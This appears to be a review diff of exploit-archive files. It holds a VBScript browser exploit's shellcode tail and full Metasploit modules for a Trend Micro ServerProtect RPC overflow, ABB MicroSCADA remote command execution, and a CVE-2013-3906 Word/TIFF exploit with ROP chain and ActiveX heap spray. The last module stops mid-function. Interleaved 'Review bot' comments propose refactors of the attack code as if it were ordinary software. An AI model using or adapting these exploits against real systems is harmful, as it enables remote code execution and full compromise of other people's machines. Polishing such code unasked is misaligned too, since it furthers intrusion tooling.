unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.UnlockModule egg, 1, "default" End Sub </script> </span> </code></pre>
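Review bot: The Time Table in the embedded header uses an inconsistent date layout — `2007/30/04` reads as year/day/month while `2007/06/05` and the page heading `2007/05/06` read as year/month/day — so the discovery-to-disclosure timeline cannot be reconstructed reliably. Normalizing every entry to one order, e.g. `2007/04/30 -> Bug discovered`, would fix that. The HTML and VBScript are also collapsed onto three very long lines, which makes line-based diffs of this file useless; one element or statement per line would keep the file reviewable.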


@ -0,0 +1,93 @@
source: http://www.securityfocus.com/bid/23868/info
Trend Micro ServerProtect is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting this issue allows attackers to execute arbitrary machine code with SYSTEM-level privileges and to completely compromise affected computers. Failed exploit attempts will result in a denial of service.
##
# $Id: trendmicro_serverprotect_createbinding.rb 5100 2007-09-10 01:01:20Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Antivirus::Trendmicro_Serverprotect_Createbinding < Msf::Exploit::Remote
include Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5100 $',
'References' =>
[
['BID', '23868'],
['CVE', '2007-2508'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x65675aa8 } ], # pop esi; pop ecx; ret - StRpcSrv.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 7 2007'))
register_options( [ Opt::RPORT(5168) ], self.class )
end
def exploit
connect
handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
filler = rand_text_alpha(360) + Rex::Arch::X86.jmp_short(6) + make_nops(2)
filler << [target.ret].pack('V') + payload.encoded
filler << rand_text_english(1400 - payload.encoded.length)
len = filler.length
sploit = NDR.long(0x001f0002) + NDR.long(len) + filler + NDR.long(len)
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
end

116
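--- a/platforms/windows/remote/30009.rb
+++ b/platforms/windows/remote/30009.rb
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::CmdStagerVBS
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',
+'Description' => %q{
+This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
+issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
+component, which allows arbitrary commands. The component is disabled by default, but
+required when a project uses the SCIL function WORKSTATION_CALL.
+This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over
+Windows XP SP3 and Windows 7 SP1.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Brian Gorenc', # Original discovery
+'juan vazquez' # Metasploit module
+],
+'References' =>
+[
+[ 'OSVDB', '100324'],
+[ 'ZDI', '13-270' ],
+[ 'URL', 'http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/41ccfa8ccd0431e6c1257c1200395574/$file/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']
+],
+'Platform' => 'win',
+'Arch' => ARCH_X86,
+'DefaultOptions' =>
+{
+'WfsDelay' => 5
+},
+'Targets' =>
+[
+[ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
+],
+'DefaultTarget' => 0,
+'Privileged' => false,
+'DisclosureDate' => 'Apr 05 2013'
+))
+register_options([Opt::RPORT(12221)], self.class)
+end
+def check
+# Send an EXECUTE packet without command, a valid response
+# should include an error code, which is good enough to
+# fingerprint.
+op = "EXECUTE\x00"
+pkt_length = [4 + op.length].pack("V") # 4 because of the packet length
+pkt = pkt_length
+pkt << op
+connect
+sock.put(pkt)
+res = sock.get_once
+disconnect
+if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001
+return Exploit::CheckCode::Vulnerable
+end
+return Exploit::CheckCode::Safe
+end
+def exploit
+# More then 750 will trigger overflow...
+# Cleaning is done by the exploit on execute_cmdstager_end
+execute_cmdstager({:linemax => 750, :nodelete => true})
+end
+def execute_cmdstager_end(opts)
+@var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
+@var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
+@var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
+@var_decoder = @stager_instance.instance_variable_get(:@var_decoder)
+print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")
+execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})
+print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")
+execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})
+print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")
+execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})
+end
+def execute_command(cmd, opts)
+op = "EXECUTE\x00"
+command = "cmd.exe /c #{cmd}"
+pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length
+pkt = pkt_length
+pkt << op
+pkt << command
+connect
+sock.put(pkt)
+res = sock.get_once
+disconnect
+unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1
+fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")
+end
+end
+end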
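Review bot: The 6-byte reply decode is written twice — in `check` at `if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and ...` and again in the `unless` that closes `execute_command` — and both use `and`, which binds looser than `&&` and is reserved by the style guide for control flow, so a later edit that assigns inside the condition silently changes its meaning. A small helper returning the status DWORD (or nil on a missing or short reply) would let `check` read `return Exploit::CheckCode::Vulnerable if reply_status(res) == 0xe10001` and `execute_command` compare `reply_status(res) == 1`; that also keeps the two fingerprint-vs-success conditions from drifting apart. `execute_command` additionally takes an `opts` argument it never reads; if the CmdStager contract requires the parameter, naming it `_opts` makes that explicit. Whether the service can split the 6-byte reply across reads is not visible here, so the single `sock.get_once` is left as is.
```ruby
# Decodes a wserver reply: a 16-bit field expected to be 6, then a 32-bit status code.
# Returns the status DWORD, or nil when the reply is missing or not exactly 6 bytes.
def reply_status(res)
  return nil unless res && res.length == 6 && res[0, 2].unpack("v")[0] == 6
  res[2, 4].unpack("V")[0]
end
```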
912
platforms/windows/remote/30011.rb Executable file

@ -0,0 +1,912 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
require 'nokogiri'
module ::Nokogiri
module XML
class Builder
#
# Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
# So here's our hack to get around that by adding a new custom method to the Builder class
#
def custom_root(ns)
e = @parent.create_element(ns)
e.add_namespace_definition(ns, "href")
@ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
return self
end
end
end
end
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Tagged Image File Format (TIFF) Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Microsoft's Tagged Image File Format.
It was originally discovered in the wild, targeting Windows XP and Windows Server 2003
users running Microsoft Office, specifically in the Middle East and South Asia region.
The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
and stored in the EAX register. The 32-bit register will run out of storage space to
represent the large vlaue, which ends up being 0, but it still gets pushed as a
dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
chunk anyway with size 0, and the address of this chunk is used as the destination buffer
of a memcpy function, where the source buffer is the EXIF data (an extended image format
supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
by HeapAlloc will end up being overwritten by the memcpy function, and then later used
in OGL!GdipCreatePath. By successfully controlling this function pointer, and the
memory layout using ActiveX, it is possible to gain arbitrary code execution under the
context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3906' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ]
],
'Payload' =>
{
'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'PrependMigrate' => true
},
'Platform' => 'win',
'Targets' =>
[
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Starndard 2010', {}],
],
'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
], self.class)
end
#
# Creates a TIFF that triggers the overflow
#
def make_tiff
# TIFF Header:
# TIFF ID = 'II' (Intel order)
# TIFF Version = 42d
# Offset of FID = 0x000049c8h
#
# Image Directory:
# Number of entries = 17d
# Entry[0] NewSubFileType = 0
# Entry[1] ImageWidth = 256d
# Entry[2] ImageHeight = 338d
# Entry[3] BitsPerSample = 8 8 8
# Entry[4] Compression = JPEG (6)
# Entry[5] Photometric Interpretation = RGP
# Entry[6] StripOffsets = 68 entries (349 bytes)
# Entry[7] SamplesPerPixel = 3
# Entry[8] RowsPerStrip = 5
# Entry[9] StripByteCounts = 68 entries (278 bytes)
# Entry[10] XResolution = 96d
# Entry[11] YResolution = 96d
# Entry[12] Planar Configuration = Clunky
# Entry[13] Resolution Unit = Inch
# Entry[14] Predictor = None
# Entry[15] JPEGInterchangeFormatLength = 5252h (1484h)
# Entry[16] JPEGInterchangeFormat = 13636d
# Notes:
# These values are extracted from the file to calculate the HeapAlloc size that result in the overflow:
# - JPEGInterchangeFormatLength
# - DWORD at offset 3324h (0xffffb898), no documentation for this
# - DWORDS after offset 3328h, no documentation for these, either.
# The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy
# The trigger is really a TIF file, but is named as a JPEG in the docx package
buf = ''
path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg")
::File.open(path, "rb") do |f|
buf = f.read
end
# Gain control of the call [eax+50h] instruction
# XCHG EAX, ESP; RETN msvcrt
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
buf
end
#
# Generates a payload
#
def get_rop_payload
p = ''
p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
p << payload.encoded
block = p
block << rand_text_alpha(1024 - 80 - p.length)
block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt
block << rand_text_alpha(1024 - block.length)
buf = ''
while (buf.length < 0x80000)
buf << block
end
buf
end
#
# Creates an ActiveX bin that will be used as a spray in Office
#
def make_activex_bin
#
# How an ActiveX bin is referred:
# document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin
# Every bin is a Microsoft Compound Document File:
# http://www.openoffice.org/sc/compdocfileformat.pdf
# The bin file
mscd = ''
mscd << [0xe011cfd0].pack('V') # File identifier (first 4 byte)
mscd << [0xe11ab1a1].pack('V') # File identifier (second 4 byte)
mscd << [0x00000000].pack('V') * 4 # Unique Identifier
mscd << [0x003e].pack('v') # Revision number
mscd << [0x0003].pack('v') # Version number
mscd << [0xfffe].pack('v') # Byte order: Little-Endian
mscd << [0x0009].pack('v') # Sector size
mscd << [0x0006].pack('v') # Size of a short-sector
mscd << "\x00" * 10 # Not used
mscd << [0x00000001].pack('V') # Total number of sectors
mscd << [0x00000001].pack('V') # SecID for the first sector
mscd << [0x00000000].pack('V') # Not used
mscd << [0x00001000].pack('V') # Minimum size of a standard stream
mscd << [0x00000002].pack('V') # Sec ID of first sector
mscd << [0x00000001].pack('V') # Total number of sectors for the short-sector table
mscd << [0xfffffffe].pack('V') # SecID of first sector of the mastser sector table
mscd << [0x00000000].pack('V') # Total number of sectors for master sector talbe
mscd << [0x00000000].pack('V') # SecIDs
mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
mscd[0x200, 4] = [0xfffffffd].pack('V')
mscd[0x204, 12] = [0xfffffffe].pack('V') * 3
mscd << Rex::Text.to_unicode("Root Entry")
mscd << [0x00000000].pack('V') * 11
mscd << [0x0016].pack('v') # Valid range of the previous char array
mscd << "\x05" # Type of entry (Root Storage Entry)
mscd << "\x00" # Node colour of the entry (red)
mscd << [0xffffffff].pack('V') # DirID of the left child node
mscd << [0xffffffff].pack('V') # DirID of the right child node
mscd << [0x00000001].pack('V') # DirID of the root node entry
mscd << [0x1efb6596].pack('V')
mscd << [0x11d1857c].pack('V')
mscd << [0xc0006ab1].pack('V')
mscd << [0x283628f0].pack('V')
mscd << [0x00000000].pack('V') * 3
mscd << [0x287e3070].pack('V')
mscd << [0x01ce2654].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0x00000100].pack('V')
mscd << [0x00000000].pack('V')
mscd << Rex::Text.to_unicode("Contents")
mscd << [0x00000000].pack('V') * 12
mscd << [0x01020012].pack('V')
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 10
mscd << [0x000000e4].pack('V')
mscd << [0x00000000].pack('V') * 18
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 29
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 12
mscd << [0x00000001].pack('V')
mscd << [0x00000002].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 32 #52
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
mscd << [0xffffffff].pack('V') * 18
mscd << @rop_payload
mscd
end
#
# Creates an activeX[num].xml file
# @param rid [String] The relationship ID (example: rId1)
# @return [String] XML document
#
def make_activex_xml(rid)
attrs = {
'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
'ax:persistence' => "persistStorage",
'r:id' => "rId#{rid.to_s}",
'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => @schema
}
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("ax")
xml.ocx(attrs)
end
builder.to_xml(:indent => 0)
end
#
# Creates an activeX[num].xml.rels
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, :target
# @return [String] XML document
#
def make_activex_xml_reals(rid, target_bin)
acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
end
end
builder.to_xml(:indent => 0)
end
#
# Creates a document.xml.reals file
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, and :target
# @return [String] XML document
#
def make_doc_xml_reals(relationships)
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
relationships.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
end
end
end
builder.to_xml(:indent => 0)
end
#
# Creates a _rels/.rels file
#
def init_rels(doc_xml, doc_props)
rels = []
rels << doc_xml
rels << doc_props
rels = rels.flatten
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
rels.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
end
end
end
{
:fname => "_rels/.rels",
:data => builder.to_xml(:indent => 0)
}
end
#
# Creates a run element for chart
# @param xml [Element]
# @param rid [String]
#
def create_chart_run_element(xml, rid)
drawingml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val' => "en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
xml['wp'].extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
xml['wp'].cNvGraphicFramePr
xml['a'].graphic do
xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
xml['c'].chart({'r:id'=>"rId#{rid.to_s}"})
end
end
end
end
end
end
#
# Creates a run element for ax
# @param xml [Element]
# @param rid [String]
#
def create_ax_run_element(xml, rid)
shape_attrs = {
'id' => "_x0000_i10#{rid.to_s}",
'type' => "#_x0000_t75",
'style' => "width:1pt;height:1pt",
'o:ole' => ""
}
control_attrs = {
'r:id' => "rId#{rid.to_s}",
'w:name' => "TabStrip#{rid.to_s}",
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
}
xml.r do
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
xml['v'].shape(shape_attrs)
xml['w'].control(control_attrs)
end
end
end
#
# Creates a pic run element
# @param xml [Element]
# @param rid [String]
#
def create_pic_run_element(xml, rid)
drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val'=>"en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
xml.extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
xml['wp'].cNvGraphicFramePr do
xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})
end
xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do
xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].nvPicPr do
xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"})
xml['pic'].cNvPicPr
end
xml['pic'].blipFill do
xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print")
xml['a'].stretch do
xml['a'].fillRect
end
end
xml['pic'].spPr do
xml['a'].xfrm do
xml['a'].off({'x'=>"0", 'y'=>"0"})
xml['a'].ext({'cx'=>"1", 'cy'=>"1"})
end
xml['a'].prstGeom({'prst' => "rect"}) do
xml['a'].avLst
end
end
end
end
end
end
end
end
end
#
# Creates a document.xml file
# @param pre_defs [Array]
# @param activex [Array]
# @param tiff_file [Array]
# @return [String] XML document
#
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
# Get all the ActiveX RIDs
ax_rids = []
activex.select { |e| ax_rids << e[:id] }
# Get the TIFF RID
tiff_rid = tiff_file[:id]
# Documentation on how this is crafted:
# http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
doc_attrs = {
'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
'xmlns:o' => "urn:schemas-microsoft-com:office:office",
'xmlns:r' => @schema,
'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
'xmlns:v' => "urn:schemas-microsoft-com:vml",
'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main",
'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart"
}
p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("w")
xml.document(doc_attrs) do
xml.body do
# Paragraph (ActiveX)
xml.p(p_attrs_1) do
# Paragraph properties
xml.pPr do
# Run properties
xml.rPr do
xml.lang({'w:val' => "en-US"})
end
end
ax_rids.each do |rid|
create_ax_run_element(xml, rid)
end
end
xml.p(p_attrs_2) do
xml.pPr do
xml.rPr do
xml['w'].lang({'w:val'=>"en-US"})
end
end
# Charts
chart_rids.each do |rid|
create_chart_run_element(xml, rid)
end
# TIFF
create_pic_run_element(xml, tiff_rid)
end
end
end
end
{
:id => (last_rid + 1).to_s,
:type => "#{@schema}/officeDocument",
:fname => "/word/document.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
:xml => builder.to_xml(:indent => 0)
}
end
#
# Creates a [Content.Types].xml file located in the parent directory
# @param overrides [Array] A collection of hashes with each containing
# the :PartName and :ContentType info
# @return [String] XML document
#
def make_contenttype_xml(overrides)
contenttypes = [
{
:Extension => "rels",
:ContentType => "application/vnd.openxmlformats-package.relationships+xml"
},
{
:Extension => "xml",
:ContentType => "application/xml"
},
{
:Extension => "jpeg",
:ContentType => "image/jpeg"
},
{
:Extension => "bin",
:ContentType => "application/vnd.ms-office.activeX"
},
{
:Extension => "xlsx",
:ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
}
]
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
# Default extensions
contenttypes.each do |contenttype|
xml.Default(contenttype)
end
# Additional overrides
overrides.each do |override|
override_attrs = {
:PartName => override[:PartName] || override[:fname],
:ContentType => override[:ContentType]
}
xml.Override(override_attrs)
end
end
end
builder.to_xml(:indent => 0)
end
#
# Pre-define some items that will be used in .rels
#
def init_doc_props(last_rid)
items = []
items << {
:id => (last_rid += 1),
:type => "#{@schema}/extended-properties",
:fname => "/docProps/app.xml",
:content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
}
items << {
:id => (last_rid += 1),
:type => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties",
:fname => "/docProps/core.xml",
:content_type => "application/vnd.openxmlformats-package.core-properties+xml"
}
return last_rid, items
end
#
# Pre-define some items that will be used in document.xml.rels
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {
:id => (last_rid += 1),
:type => "#{@schema}/styles",
:fname => "/word/styles.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/settings",
:fname => "/word/settings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/webSettings",
:fname => "/word/webSettings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/fontTable",
:fname => "/word/fontTable.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/theme",
:fname => "/word/theme/theme1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart2.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart3.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart4.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart5.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart6.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
return last_rid, items
end
#
# Manually create everything manually in the ActiveX directory
#
def init_activex_files(last_rid)
activex = []
0x250.times do |i|
id = (last_rid += 1)
bin = {
:fname => "/word/activeX/activeX#{id.to_s}.bin",
:bin => make_activex_bin
}
xml = {
:fname => "/word/activeX/activeX#{id.to_s}.xml",
:xml => make_activex_xml(id)
}
rels = {
:fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels",
:rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}/control"
activex << {
:id => id,
:bin => bin,
:xml => xml,
:rels => rels,
:content_type => ct,
:type => type
}
end
return last_rid, activex
end
#
# Create a [Content_Types.xml], each node contains these attributes:
# :PartName The path to an ActiveX XML file
# :ContentType The contenttype of the XML file
#
def init_contenttype_xml_file(*items)
overrides = []
items.each do |item|
item.each do |obj|
overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
end
end
{:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
end
#
# Creates the tiff file
#
def init_tiff_file(last_rid)
id = last_rid + 1
tiff_data = {
:id => id,
:fname => "/word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}/image"
}
return id, tiff_data
end
#
# Create the document.xml.rels file
#
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
end
reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
